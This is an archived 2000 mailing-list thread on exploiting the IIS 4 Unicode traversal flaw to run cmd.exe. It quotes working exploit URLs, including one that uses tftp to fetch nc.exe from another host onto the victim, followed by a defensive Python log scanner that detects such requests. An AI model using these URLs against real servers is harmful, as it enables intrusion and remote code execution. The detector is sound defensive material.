Subject: Re: dos commands via iis 4 (TFTP)
From: booboo (booboo65535.COM)
Date: Tue Nov 14 2000 - 08:30:36 CST


you can also normally swap the - with a / as in netstat+"-a" or netstat+/a

BooBoo

On Fri, 10 Nov 2000, Loschiavo, Dave wrote:

> Thanks, looks like I inadvertently left the "get" out of the message. I was
> including that in the URL when testing. However, what I did notice was the
> use of the quotes in the "-i" area of the URL. I was not using quotes. Will
> have to give that a shot.
>
> -thanks
>
> -----Original Message-----
> From: Robert A. Seace
> To: DLoschiavofrcc.cc.ca.us
> Cc: VULN-DEVSECURITYFOCUS.COM
> Sent: 11/10/00 10:11 AM
> Subject: Re: dos commands via iis 4 (TFTP)
>
> In the profound words of Loschiavo, Dave:
> >
> > I tried tftp commands in the URL, formatted like this:
> >
> > http://192/168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/tftp+-i+192.168.1.20+nc.exe"
> >
> > and got nowhere, while this:
> >
> > http://192.168.1.250/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c: gave me a listing of the c: drive.
> >
> > Am I formatting the "TFTP" URL incorrectly?
>
> Yeah, I think so... But, I'm no TFTP guru, either...
> Personally, I would just use RCP...
>
> However, looking at the original advisory on BugTraq, that
> mentioned using TFTP ("http://www.securityfocus.com/archive/1/141048"),
> I think you need a "GET" before the "nc.exe", and maybe a destination
> location specified after it, for where to place it on the NT box...
> For instance, it shows an URL of:
>
> /[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe
>
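
For defenders reviewing web server logs for the request form discussed in this thread, the following added example (not part of the original messages) flags request targets that hide path characters in overlong UTF-8 such as `%c0%af`, traverse directories, or reach `cmd.exe` / `tftp.exe`. The function names and finding labels are hypothetical, and the sample targets are constructed except the first, which is the form quoted above.

```python
from urllib.parse import unquote_to_bytes

# Binaries the thread shows being reached through the traversal.
SUSPECT_EXES = (b"cmd.exe", b"tftp.exe")

def normalise(raw: bytes) -> bytes:
    """Collapse 2-byte overlong UTF-8 forms (lead 0xC0/0xC1) to the ASCII byte they hide."""
    out, i = bytearray(), 0
    while i < len(raw):
        if raw[i] in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(((raw[i] & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            i += 2
        else:
            out.append(raw[i])
            i += 1
    return bytes(out)

def classify(request_target: str) -> list:
    """Return findings for one logged request target (path plus query string)."""
    raw = unquote_to_bytes(request_target)   # undo %XX escapes only
    norm = normalise(raw)
    findings = []
    if norm != raw:
        findings.append("overlong-utf8")     # never valid in well-formed UTF-8
    if b"../" in norm or b"..\\" in norm:
        findings.append("traversal")
    if any(exe in norm.lower() for exe in SUSPECT_EXES):
        findings.append("system-binary")
    return findings

# Sample request targets: the first is the form quoted in the thread,
# the other two are constructed for comparison.
SAMPLES = [
    "/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:",
    "/scripts/..%2f../winnt/system32/CMD.EXE?/c+dir",
    "/default.asp?id=7",
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(classify(target), target)
```

A hit on `overlong-utf8` alone is worth alerting on, since a conforming client never emits those byte sequences.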